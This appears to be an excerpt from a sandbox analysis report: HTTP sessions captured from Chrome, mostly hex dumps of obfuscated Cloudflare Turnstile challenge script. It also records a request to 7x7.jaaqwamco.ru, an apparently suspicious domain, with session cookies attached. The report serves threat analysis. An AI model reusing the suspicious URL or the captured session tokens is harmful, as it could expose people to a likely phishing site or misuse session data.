                                                                              2024-11-26 19:54:46 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32
                                                                              Data Ascii: _footer_privacy":"Privacy","turnstile_overrun_description":"Stuck%20here%3F","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%2
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 2c 67 6c 2c 67 70 2c 67 71 2c 67 78 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 36 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 36 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 35 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 34 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 34 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 31 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                                                              Data Ascii: ,gl,gp,gq,gx,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1306))/1+parseInt(gI(1456))/2+-parseInt(gI(1466))/3*(parseInt(gI(815))/4)+parseInt(gI(1064))/5*(parseInt(gI(1614))/6)+parseInt(gI(971))/7*(parseInt(gI
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 4f 47 48 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 61 4d 41 55 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 52 50 58 71 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 71 4b 48 6e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4b 75 6f 54 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4c 64 76 73 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6d 41 6f 43 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                              Data Ascii: n(h,i){return h(i)},'SOGHP':function(h,i){return i!==h},'aMAUg':function(h,i){return h|i},'RPXqr':function(h,i){return h-i},'qKHnN':function(h,i){return h-i},'KuoTz':function(h,i){return h(i)},'LdvsW':function(h,i){return i&h},'mAoCX':function(h,i){return
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 28 51 2c 32 29 5d 3e 3e 38 2a 28 33 2d 51 25 34 29 26 31 35 29 2c 51 2b 2b 29 3b 72 65 74 75 72 6e 20 50 7d 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 64 5b 68 7a 28 39 32 37 29 5d 28 4b 2c 69 5b 68 7a 28 31 36 32 33 29 5d 29 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 68 7a 28 31 31 32 33 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 68 7a 28 31 33 34 32 29 5d 5b 68 7a 28 31 32 38 31 29 5d 5b 68 7a 28 31 38 32 35 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 44 2b 4c 2c 4f 62 6a 65 63 74 5b 68 7a 28 31 33 34 32 29 5d 5b 68 7a 28 31 32 38 31 29 5d 5b
                                                                              Data Ascii: (Q,2)]>>8*(3-Q%4)&15),Q++);return P}else{if(null==i)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;d[hz(927)](K,i[hz(1623)]);K+=1)if(L=i[hz(1123)](K),Object[hz(1342)][hz(1281)][hz(1825)](B,L)||(B[L]=F++,C[L]=!0),M=D+L,Object[hz(1342)][hz(1281)][
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 29 2c 64 5b 68 7a 28 31 31 35 38 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 68 7a 28 35 39 35 29 5d 28 64 5b 68 7a 28 35 34 37 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 68 7a 28 31 34 38 31 29 5d 28 68 7a 28 31 36 34 31 29 2c 68 7a 28 31 36 34 31 29 29 29 47 5b 68 7a 28 31 32 33 33 29 5d 5b 68 7a 28 31 37 36 32 29 5d 3d 73 5b 68 7a 28 31 35 36 30 29 5d 2c 48 5b 68 7a 28 31 32 33 33 29 5d 5b 68 7a 28 35 38 39 29 5d 3d 68 7a 28 31 32 36 38 29 3b 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 68 7a 28 31 36 32 31 29 5d 28 49 3c 3c 31 2c 4e 29 2c 4a 3d 3d 64 5b 68 7a 28 35 39 36 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 7a 28 35 39 35 29 5d
                                                                              Data Ascii: ),d[hz(1158)](J,j-1)?(J=0,H[hz(595)](d[hz(547)](o,I)),I=0):J++,N>>=1,x++);}else if(d[hz(1481)](hz(1641),hz(1641)))G[hz(1233)][hz(1762)]=s[hz(1560)],H[hz(1233)][hz(589)]=hz(1268);else{for(N=1,x=0;x<G;I=d[hz(1621)](I<<1,N),J==d[hz(596)](j,1)?(J=0,H[hz(595)]
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 31 29 5d 28 68 44 28 31 31 35 37 29 2c 78 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 54 3d 73 5b 68 44 28 38 37 31 29 5d 28 68 44 28 31 32 30 37 29 2c 42 5b 68 44 28 36 37 37 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 72 65 74 75 72 6e 20 54 3b 63 61 73 65 27 33 27 3a 54 5b 68 44 28 31 31 34 31 29 5d 28 27 79 32 27 2c 73 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 42 26 26 54 5b 68 44 28 31 33 33 38 29 5d 5b 68 44 28 38 34 34 29 5d 28 43 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 54 5b 68 44 28 31 31 34 31 29 5d 28 27 78 31 27 2c 4e 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 54 5b 68 44 28 31 31 34 31 29 5d 28 27 79 31 27 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27
                                                                              Data Ascii: 1)](hD(1157),x);continue;case'1':T=s[hD(871)](hD(1207),B[hD(677)]);continue;case'2':return T;case'3':T[hD(1141)]('y2',s);continue;case'4':B&&T[hD(1338)][hD(844)](C);continue;case'5':T[hD(1141)]('x1',N);continue;case'6':T[hD(1141)]('y1',o);continue;case'7'
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 7d 2c 67 5b 68 76 28 31 36 38 30 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 31 33 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 45 2c 64 2c 65 2c 66 2c 67 29 7b 68 45 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 45 28 31 34 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 64 5b 68 45 28 31 37 38 36 29 5d 3d 68 45 28 31 31 38 38 29 2c 64 5b 68 45 28 31 35 35 31 29 5d 3d 68 45 28 39 31 31 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 45 28 31 30 32 34 29 5d 5b 68 45 28 31 35 32 38 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 45 28 31 36 34 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 46 29 7b 68 46 3d 68 45 2c 65 5b 68 46 28 31 34 38 38 29 5d 28 68 46 28 31 32 31 37 29 2c 68 46 28 31 32 31 37
                                                                              Data Ascii: },g[hv(1680)]=f.h,g}(),eM[gJ(1352)]=function(hE,d,e,f,g){hE=gJ,d={},d[hE(1488)]=function(h,i){return h===i},d[hE(1786)]=hE(1188),d[hE(1551)]=hE(911),e=d,f=1,g=1e3*eM[hE(1024)][hE(1528)](2<<f,32),eM[hE(1644)](function(hF){hF=hE,e[hF(1488)](hF(1217),hF(1217
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 32 29 2b 6c 2c 68 47 28 31 35 39 34 29 29 2c 31 29 2c 68 47 28 38 32 33 29 29 2b 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 31 35 35 33 29 5d 2c 27 2f 27 29 2b 65 4d 5b 68 47 28 31 37 35 35 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 38 34 36 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 68 47 28 31 34 38 34 29 5d 3d 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 31 34 38 34 29 5d 2c 6e 5b 68 47 28 38 33 32 29 5d 3d 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 38 33 32 29 5d 2c 6e 5b 68 47 28 31 38 33 31 29 5d 3d 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 31 38 33 31 29 5d 2c 6e 5b 68 47 28 31 35 32 35 29 5d 3d 65 4d 5b 68 47 28 31 37 35 35 29 5d 5b 68 47 28 31 33 38 38 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 68
                                                                              Data Ascii: 2)+l,hG(1594)),1),hG(823))+eM[hG(1755)][hG(1553)],'/')+eM[hG(1755)].cH+'/'+eM[hG(1755)][hG(846)],n={},n[hG(1484)]=eM[hG(1755)][hG(1484)],n[hG(832)]=eM[hG(1755)][hG(832)],n[hG(1831)]=eM[hG(1755)][hG(1831)],n[hG(1525)]=eM[hG(1755)][hG(1388)],o=n,s=new eM[(h
                                                                              2024-11-26 19:54:46 UTC1369INData Raw: 70 65 6f 66 20 64 5b 68 48 28 37 35 34 29 5d 3d 3d 3d 68 48 28 31 36 38 31 29 29 26 26 28 6a 3d 64 5b 68 48 28 37 35 34 29 5d 5b 68 48 28 39 33 34 29 5d 28 27 5c 6e 27 29 2c 6a 5b 68 48 28 31 36 32 33 29 5d 3e 31 29 26 26 28 65 5b 68 48 28 39 34 31 29 5d 28 68 48 28 31 33 32 36 29 2c 65 5b 68 48 28 31 35 35 32 29 5d 29 3f 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 48 28 31 35 38 35 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 68 48 28 31 34 35 32 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 68 48 28 31 37 35 36 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3a 28 73 3d 65 5b 68 48 28 31 37 35 35 29 5d 5b 68 48 28 31
                                                                              Data Ascii: peof d[hH(754)]===hH(1681))&&(j=d[hH(754)][hH(934)]('\n'),j[hH(1623)]>1)&&(e[hH(941)](hH(1326),e[hH(1552)])?(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hH(1585)](k),l&&(g=l[1],h=e[hH(1452)](parseInt,l[2],10),i=e[hH(1756)](parseInt,l[3],10))):(s=e[hH(1755)][hH(1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.1649742104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:46 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:46 UTC240INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:46 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ea7683e42b9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:46 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.1649730172.67.180.1924436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:46 UTC1319OUTGET /favicon.ico HTTP/1.1
                                                                              Host: 7x7.jaaqwamco.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://7x7.jaaqwamco.ru/Sb3OEcu/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IkhjWDRiUlBmTzNOQ2x5dldLdFVKMEE9PSIsInZhbHVlIjoiSVBVSDJNUXVuL3RRdEh2Vjl6YzQ4M2UyeFU4UHJqL29jWjJ0eDh1VXl4cWpBYXpTbmJjQ1pIMnNlMTV0bnkxV0pHVkNBcUMvRyt3TDAyUFBGUWx5eVY4U0JsYTlNTmZ1ZXJMRlNudmVaaVpmdyt0T2YySkpaeTIrYnBmblUvdUUiLCJtYWMiOiJmMDY0NDlkZmE0NjVmOGRmMWYwOThkMjNlMWQxOTEwMzIyNDEwNDI1OGRkOWE2MWNlNTY4YTAwNDA0NmRjMTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFUK3d5TVYrb2trVlRYcVNhaWw0RWc9PSIsInZhbHVlIjoic3pEU3NFek5YOW5kNVNiVHNrQTYyd3VqZTcyUmpvNDczS1Y3YU04eHErNlpwWmk4cUpoUUdoNTc2QzFSZDV4M0toV1NpREZjdFliWWw3NTZseGpjdER3TEZqa2ZvQXVybjRWU1I5NzgzU2lxYTNjYXNYSlJ2TUsvOU1jVktyT3MiLCJtYWMiOiJmYjJiNDkxNzZiMDRiNmY2MTJhOGQwZjRlY2VhMmIzZDBkYWJiMTIzZTBhNTRkZjFmY2MwZWQyMjg4YTEzNzI4IiwidGFnIjoiIn0%3D
                                                                              2024-11-26 19:54:47 UTC1018INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 26 Nov 2024 19:54:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: max-age=14400
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrEtKVGQwjzk%2BBxci6cI337FKcg7z1h%2B6pzs76O5RZkAT8L2j3orsvLARkBEovfpGzetT8Lh9UtiOZeWhQ6vGUgvBi6JAJqCAqFSEgnq17GGqIGn%2FYUbrOrrIyJiIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Vary: Accept-Encoding
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3992&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2161&delivery_rate=1018896&cwnd=252&unsent_bytes=0&cid=2328c576d3d6abcd&ts=343&x=0"
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1905
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6eac1eb14310-EWR
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1897&delivery_rate=1617728&cwnd=252&unsent_bytes=0&cid=fe11f6c4add6a472&ts=9825&x=0"
                                                                              2024-11-26 19:54:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.1649743104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:47 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:48 UTC240INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:48 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6eb2edd042ef-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.1649744104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:48 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e8c6e9b1b1b437a&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:48 UTC331INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:48 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 110785
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6eb5ce7a41f2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:48 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64
                                                                              Data Ascii: outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffund
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 72 2c 67 73 2c 67 77 2c 67 78 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 38 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 31 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 31 32 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 38 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 39 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 37 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 30 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 30 29
                                                                              Data Ascii: ,gl,gm,gn,gr,gs,gw,gx,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(818))/1+parseInt(gI(1311))/2+parseInt(gI(1412))/3+parseInt(gI(518))/4+-parseInt(gI(1169))/5*(parseInt(gI(567))/6)+parseInt(gI(740))/7*(parseInt(gI(590)
